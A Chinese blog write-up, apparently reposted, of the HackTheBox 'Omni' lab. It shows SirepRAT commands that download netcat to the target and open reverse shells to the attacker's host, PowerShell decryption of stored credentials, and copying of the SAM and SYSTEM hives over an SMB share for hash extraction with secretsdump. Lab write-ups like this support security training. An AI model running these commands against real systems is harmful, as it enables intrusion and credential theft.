我是靠谱客的博主 清脆帽子,最近开发中收集的这篇文章主要介绍hackthebox-omni (lot渗透&powershell解密&smbserver加密传输&secretsdump解密),觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

1、扫描

有价值的就8080。一般是tom猫网页。进去。但要账号密码,所以没辙。再看看nmap扫描。

C:root> nmap -A 10.10.10.204
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-21 19:16 CST
Nmap scan report for 10.10.10.204 (10.10.10.204)
Host is up (0.40s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorizedx0D
|_  Basic realm=Windows Device Portal
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   404.90 ms 10.10.14.1 (10.10.14.1)
2   405.74 ms 10.10.10.204 (10.10.10.204)


2、lot渗透

从扫描里Basic realm=Windows Device Portal 顺线索找,百度查到是lot
在这里插入图片描述
又从lot找到这个漏洞

按提示。准备好nc64或nc.exe,开启本机的http。

第一步传nc进靶机。注意是传到system32这个目录里,如此弹回的shell应该是system

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:WindowsSystem32cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:windowssystem32spooldriverscolornc.exe -uri http://10.10.14.20/nc64.exe'

第二步,用nc弹shell回本机

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:WindowsSystem32cmd.exe" --args ' /c c:windowssystem32spooldriverscolornc.exe -e cmd 10.10.14.20 31337'

收到。
在这里插入图片描述

没有whoami,传个whoami.exe进去也执行不了。但从system32判断应该是system 的shell
也可以进入admin的目录看root.txt了。
但是加密,从内容提示看是powershell加密。powershell解密
但是只能以自己的账户比如admin或app账户解他们自己的密。
所以切换到他们账户上。

3、 第一种方法,通过信息搜集找到r.bat

在这个目录下找到r.bat。里面有账号信息。
这种方法难度很大。个人也觉得没什么意义,很可能找一天也找不到。

C:Program FilesWindowsPowerShellModulesPackageManagement>type r.bat

在这里插入图片描述
找到后,用这个账号密码再次登录8080端口网页。
成功进入。此处我以admin的号进入
在process里的命令行,再次使用之前传进去的nc弹shell

c:windowssystem32spooldriverscolornc.exe -e cmd.exe 10.10.14.20 5555

在这里插入图片描述
收到。
输入powershell,进入powershell模式。输入$env:UserName可查看自己是什么用户

在这里插入图片描述
我已是admin
按之前的解密方法。进入root.txt的目录。输入这些。成功。

$credential = Import-CliXml -Path .root.txt
$credential.GetNetworkCredential().Password

在这里插入图片描述

app用户的方法,同样类推就是了。登录,弹shell。解密。

4、第二种方法。传sam等用secretsdump.py提取

如果找不到r.bat。可以考虑这个思路,但还是有问题,因为解不出admin的密码。但是可以多学习下。
需要用到著名工具包impacket地址
因为是system权限,我们可以进入system32里的config利用sam和system,提取出所有用户的密码hash。和htb这个靶机思路有些类似bastion
但是需要从靶机传到本机。

我用nc传老是报错,改为用smbserver。因为有时windows靶机报不安全smb共享,禁止使用。所以我加了账号密码pkp。这样就能用了
开启本机的smbserverpython3 /root/impacket-master/examples/smbserver.py share . -smb2support -username pkp -password pkp
每个人的impacket包版本不一样。python版本一样,设置共享share的目录不一样。所以这只是我的命令,你的可能报错,参考这改改就行了。

靶机里,连接net use \10.10.14.20share /u:pkp pkp
传送
system传时报错,不过也能传过去。

reg save HKLMsam \10.10.14.20sharesam
reg save HKLMsystem \10.10.14.20sharesystem

在这里插入图片描述
在这里插入图片描述
impacket包里的secretsdump解密
在这里插入图片描述
john再解成明文。解冒号后面的,第二段密码
但是我admin的解不出来,可以解出app的。
在这里插入图片描述

最后

以上就是清脆帽子为你收集整理的hackthebox-omni (lot渗透&powershell解密&smbserver加密传输&secretsdump解密)的全部内容,希望文章能够帮你解决hackthebox-omni (lot渗透&powershell解密&smbserver加密传输&secretsdump解密)所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(50)

评论列表共有 0 条评论

立即
投稿
返回
顶部